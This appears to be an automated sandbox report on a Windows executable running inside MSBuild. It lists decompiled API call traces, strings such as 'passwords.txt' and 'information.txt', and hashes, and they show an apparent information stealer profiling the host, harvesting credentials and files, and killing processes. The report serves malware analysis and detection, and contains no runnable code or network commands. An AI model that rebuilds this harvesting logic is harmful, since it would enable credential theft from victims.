                                                                                                                                                                                                                                                                              • Part of subcall function 00411020: VariantInit.OLEAUT32(?), ref: 00411106
                                                                                                                                                                                                                                                                              • Part of subcall function 004111E0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 00411203
                                                                                                                                                                                                                                                                              • Part of subcall function 004111E0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418), ref: 00411214
                                                                                                                                                                                                                                                                              • Part of subcall function 004111E0: CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 0041122E
                                                                                                                                                                                                                                                                              • Part of subcall function 004111E0: CoSetProxyBlanket.OLE32(00427418,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000), ref: 00411267
                                                                                                                                                                                                                                                                              • Part of subcall function 004111E0: VariantInit.OLEAUT32(?), ref: 004112C2
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,00E2E4A0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,00E2E4A0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                              • Part of subcall function 00410260: GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,00E2E4B0,?,00401074,00E2E4B0,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                              • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,00E2E4B0), ref: 00410247
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: CreateDCA.GDI32(00E2E5B0,00000000,00000000,00000000), ref: 00410BCA
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410BD5
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410BE0
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: ReleaseDC.USER32(00000000,00000000), ref: 00410BEB
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000), ref: 00410BF8
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415D2A,?,00000000,?,Display Resolution: ,00000000,?,00427448,00000000,?), ref: 00410BFF
                                                                                                                                                                                                                                                                              • Part of subcall function 00410BB0: wsprintfA.USER32 ref: 00410C0F
                                                                                                                                                                                                                                                                              • Part of subcall function 00410370: GetKeyboardLayoutList.USER32(00000000,00000000,0042708F,?,?,00000001), ref: 004103B7
                                                                                                                                                                                                                                                                              • Part of subcall function 00410370: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004103C9
                                                                                                                                                                                                                                                                              • Part of subcall function 00410370: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004103D4
                                                                                                                                                                                                                                                                              • Part of subcall function 00410370: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410406
                                                                                                                                                                                                                                                                              • Part of subcall function 00410370: LocalFree.KERNEL32(?,?,?,00000001), ref: 004104AA
                                                                                                                                                                                                                                                                              • Part of subcall function 00410300: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410311
                                                                                                                                                                                                                                                                              • Part of subcall function 00410300: HeapAlloc.KERNEL32(00000000), ref: 00410318
                                                                                                                                                                                                                                                                              • Part of subcall function 00410300: GetTimeZoneInformation.KERNEL32(?), ref: 00410327
                                                                                                                                                                                                                                                                              • Part of subcall function 00410300: wsprintfA.USER32 ref: 00410352
                                                                                                                                                                                                                                                                              • Part of subcall function 004104D0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104E5
                                                                                                                                                                                                                                                                              • Part of subcall function 004104D0: HeapAlloc.KERNEL32(00000000), ref: 004104EC
                                                                                                                                                                                                                                                                              • Part of subcall function 004104D0: RegOpenKeyExA.KERNEL32(80000002,00E306D8,00000000,00020119,00000000), ref: 0041050B
                                                                                                                                                                                                                                                                              • Part of subcall function 004104D0: RegQueryValueExA.KERNEL32(00000000,00E39238,00000000,00000000,00000000,000000FF), ref: 00410526
                                                                                                                                                                                                                                                                              • Part of subcall function 004104D0: RegCloseKey.ADVAPI32(00000000), ref: 00410530
                                                                                                                                                                                                                                                                              • Part of subcall function 00410580: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105A2
                                                                                                                                                                                                                                                                              • Part of subcall function 00410580: GetLastError.KERNEL32(?,?,00000001), ref: 004105B0
                                                                                                                                                                                                                                                                              • Part of subcall function 00410580: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 004105E8
                                                                                                                                                                                                                                                                              • Part of subcall function 00410580: wsprintfA.USER32 ref: 00410632
                                                                                                                                                                                                                                                                              • Part of subcall function 00410540: GetSystemInfo.KERNEL32(00000000), ref: 0041054D
                                                                                                                                                                                                                                                                              • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410563
                                                                                                                                                                                                                                                                              • Part of subcall function 00410680: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480), ref: 0041068E
                                                                                                                                                                                                                                                                              • Part of subcall function 00410680: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480,00000000), ref: 00410695
                                                                                                                                                                                                                                                                              • Part of subcall function 00410680: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 004106B5
                                                                                                                                                                                                                                                                              • Part of subcall function 00410680: wsprintfA.USER32 ref: 004106DB
                                                                                                                                                                                                                                                                              • Part of subcall function 004106F0: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410747
                                                                                                                                                                                                                                                                              • Part of subcall function 004106F0: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 004107D4
                                                                                                                                                                                                                                                                              • Part of subcall function 00410AA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410AEF
                                                                                                                                                                                                                                                                              • Part of subcall function 00410AA0: Process32First.KERNEL32(00000000,00000128), ref: 00410AFF
                                                                                                                                                                                                                                                                              • Part of subcall function 00410AA0: Process32Next.KERNEL32(00000000,00000128), ref: 00410B11
                                                                                                                                                                                                                                                                              • Part of subcall function 00410AA0: Process32Next.KERNEL32(00000000,00000128), ref: 00410B7E
                                                                                                                                                                                                                                                                              • Part of subcall function 00410AA0: CloseHandle.KERNEL32(00000000), ref: 00410B89
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: RegOpenKeyExA.KERNEL32(00000000,00E367A0,00000000,00020019,00000000,004270A7,?,00000001), ref: 0041085F
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: RegEnumKeyExA.KERNEL32(00000000,?,?,0042750C,00000000,00000000,00000000,00000000,?,?,00000001), ref: 004108BE
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: wsprintfA.USER32 ref: 004108E7
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410905
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: RegQueryValueExA.KERNEL32(?,00E39DF0,00000000,000F003F,?,00000400), ref: 00410935
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: lstrlen.KERNEL32(?), ref: 0041094A
                                                                                                                                                                                                                                                                              • Part of subcall function 00410800: RegQueryValueExA.KERNEL32(?,00E39D30,00000000,000F003F,?,00000400,00000000,004219B1,?,00000000,?,004270D8), ref: 004109CE
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,?,0042751C,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416407
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$CloseInformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                                                                                                                                                                                                            • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                                                                            • API String ID: 521975125-4117839003
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00E300C0,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CFC9
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D026
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0040D02D
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 0040D0DA
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00E39750), ref: 0040D0F4
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D107
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A58), ref: 0040D116
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D129
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A5C), ref: 0040D138
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00E39780), ref: 0040D149
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D15C
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A60), ref: 0040D16B
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00E397F0), ref: 0040D17B
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D18E
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A64), ref: 0040D19D
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00E38CB8), ref: 0040D1AE
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00000000), ref: 0040D1C1
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A68), ref: 0040D1D0
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(000000FF,00426A6C), ref: 0040D1DF
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(000000FF), ref: 0040D217
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040D269
                                                                                                                                                                                                                                                                              • Part of subcall function 00407110: memcmp.MSVCRT ref: 0040714B
                                                                                                                                                                                                                                                                              • Part of subcall function 00407110: memset.MSVCRT ref: 00407179
                                                                                                                                                                                                                                                                              • Part of subcall function 00407110: LocalAlloc.KERNEL32(00000040,?), ref: 004071B0
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040D299
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                                                                                                                                                                                                            • String ID: `$passwords.txt
                                                                                                                                                                                                                                                                            • API String ID: 998505060-1172772161
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00427618,?,?,?,?,?,?,?,00416AC2,?), ref: 0041655C
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0042761C,?,?,?,?,?,?,?,00416AC2,?), ref: 00416576
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0041659B
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00427343,?,?,?,?,?,?,?,?,?,?,?,00416AC2,?), ref: 004165AD
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004165D5
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004165F7
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041660D
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416620
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00416636
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00416663
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0041667C
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 0041668C
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 004166A2
                                                                                                                                                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004166BA
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004166FD
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00416718
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0041672E
                                                                                                                                                                                                                                                                              • Part of subcall function 004118D0: CreateFileA.KERNEL32(@gA,80000000,00000003,00000000,00000003,00000080,00000000,?,00416740,?), ref: 004118ED
                                                                                                                                                                                                                                                                              • Part of subcall function 004118D0: GetFileSizeEx.KERNEL32(00000000,?), ref: 004118FF
                                                                                                                                                                                                                                                                              • Part of subcall function 004118D0: CloseHandle.KERNEL32(00000000), ref: 0041190A
                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041674B
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0041675E
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 004167FB
                                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,?,?,00416AC2,?), ref: 00416872
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,?,?,?,00416AC2,?), ref: 00416884
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$strtok_swsprintf$CloseDeleteFindlstrcatmemset$CopyCreateHandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                            • String ID: %s%s$%s\%s$%s\%s\%s
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414638
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00413A40: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413AB5
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004146CD
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041480B
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004148A0
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004149EA
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414A8C
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414BCA
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414C5F
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DA9
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E3E
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 00414E4D
                                                                                                                                                                                                                                                                              • Part of subcall function 00413B80: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C14
                                                                                                                                                                                                                                                                              • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00422019), ref: 00413C2B
                                                                                                                                                                                                                                                                              • Part of subcall function 00413B80: StrStrA.SHLWAPI(00000000,00000000), ref: 00413C57
                                                                                                                                                                                                                                                                              • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000), ref: 00413C6C
                                                                                                                                                                                                                                                                              • Part of subcall function 00413B80: lstrlen.KERNEL32(00000000), ref: 00413C89
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                                                                                            • String ID: -$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                            • API String ID: 507064821-1903984052
                                                                                                                                                                                                                                                                            • Opcode ID: c96fb55f8d8bf10598374de45fbc6fc312ce8e8bb0848338d8377d4eb4593662
                                                                                                                                                                                                                                                                            • Instruction ID: 6a2bbd2f173dbc1054a30c93a0a01a9f01b5700f65783502aefbb1eff031eee4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c96fb55f8d8bf10598374de45fbc6fc312ce8e8bb0848338d8377d4eb4593662
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AB28470C01248EACB14EBB5C9566DDBBB86F15308F5480BEE945736C2DB78670CCBA6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00410090: StrCmpCA.SHLWAPI(?,00000000,?,00407476,00E398A0,?,00000000,?), ref: 0041009A
  • Part of subcall function 0040FEB0: lstrlen.KERNEL32(00418579,?,00000000,?,00417CAD,00427387,00427386,00000000,?,00000000,00422CB8,000000FF,?,00418579), ref: 0040FEBB
  • Part of subcall function 0040FEB0: lstrcpy.KERNEL32(00000000,00418579), ref: 0040FEF2
  • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
  • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
  • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
  • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
  • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
  • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00E300C0,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
  • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
  • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040751F
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040755D
• GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004077D6
• lstrcat.KERNEL32(000000FF,00000000), ref: 00407925
• lstrcat.KERNEL32(000000FF,00426A98), ref: 00407934
• lstrcat.KERNEL32(000000FF,00000000), ref: 00407947
• lstrcat.KERNEL32(000000FF,00426A9C), ref: 00407956
• lstrcat.KERNEL32(000000FF,00000000), ref: 00407969
• lstrcat.KERNEL32(000000FF,00426AA0), ref: 00407978
• lstrcat.KERNEL32(000000FF,00000000), ref: 0040798B
• lstrcat.KERNEL32(000000FF,00426AA4), ref: 0040799A
• lstrcat.KERNEL32(000000FF,00000000), ref: 004079AD
• lstrcat.KERNEL32(000000FF,00426AA8), ref: 004079BC
• lstrcat.KERNEL32(000000FF,00000000), ref: 004079CF
• lstrcat.KERNEL32(000000FF,00426AAC), ref: 004079DE
• lstrcat.KERNEL32(000000FF,00000000), ref: 00407A25
• lstrcat.KERNEL32(000000FF,00426AB0), ref: 00407A43
• lstrlen.KERNEL32(000000FF), ref: 00407AAA
• lstrlen.KERNEL32(000000FF), ref: 00407AB9
• RtlAllocateHeap.NTDLL(00000000), ref: 004077DD
  • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
  • Part of subcall function 00411A20: memset.MSVCRT ref: 00411A55
  • Part of subcall function 00411A20: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407546,0040DA84), ref: 00411A86
  • Part of subcall function 00411A20: HeapAlloc.KERNEL32(00000000,?,00407546,0040DA84), ref: 00411A8D
  • Part of subcall function 00411A20: wsprintfW.USER32 ref: 00411A9C
  • Part of subcall function 00411A20: OpenProcess.KERNEL32(00001001,00000000), ref: 00411AFD
  • Part of subcall function 00411A20: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B0C
  • Part of subcall function 00411A20: CloseHandle.KERNEL32(00000000), ref: 00411B13
• memset.MSVCRT ref: 00407B10
• DeleteFileA.KERNEL32(00000000,?,?,?,00426A62), ref: 00407B38
Memory Dump Source
• Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: lstrcat$lstrcpy$HeapProcesslstrlen$File$Copymemset$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimewsprintf
• String ID:
• API String ID: 2919035586-0
• Opcode ID: 518233657cb6299c0721680168a5d26dd10e2a0b98dfd8bf3f0d8e71403cf21c
• Instruction ID: ac20bff3860d788065b8a73e72d727c9ff0ab2c095c62357def0f70ed4808e92
• Opcode Fuzzy Hash: 518233657cb6299c0721680168a5d26dd10e2a0b98dfd8bf3f0d8e71403cf21c
• Instruction Fuzzy Hash: 63325F71900248EACB14EBE4DD55BEEBB79AF19308F10417EF50273292DB786A08CB65
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
  • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
  • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
  • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
  • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
  • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,00E300C0,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
  • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
  • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004097F6
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409962
• RtlAllocateHeap.NTDLL(00000000), ref: 00409969
• lstrcat.KERNEL32(000000FF,00000000), ref: 00409AAF
• lstrcat.KERNEL32(000000FF,00426C78), ref: 00409ABE
• lstrcat.KERNEL32(000000FF,00000000), ref: 00409AD1
• lstrcat.KERNEL32(000000FF,00426C7C), ref: 00409AE0
• lstrcat.KERNEL32(000000FF,00000000), ref: 00409AF3
• lstrcat.KERNEL32(000000FF,00426C80), ref: 00409B02
• lstrcat.KERNEL32(000000FF,00000000), ref: 00409B15
• lstrcat.KERNEL32(000000FF,00426C84), ref: 00409B24
• lstrcat.KERNEL32(000000FF,00000000), ref: 00409B37
• lstrcat.KERNEL32(000000FF,00426C88), ref: 00409B46
• lstrcat.KERNEL32(000000FF,00000000), ref: 00409B59
• lstrcat.KERNEL32(000000FF,00426C8C), ref: 00409B68
• lstrcat.KERNEL32(000000FF,00000000), ref: 00409B7B
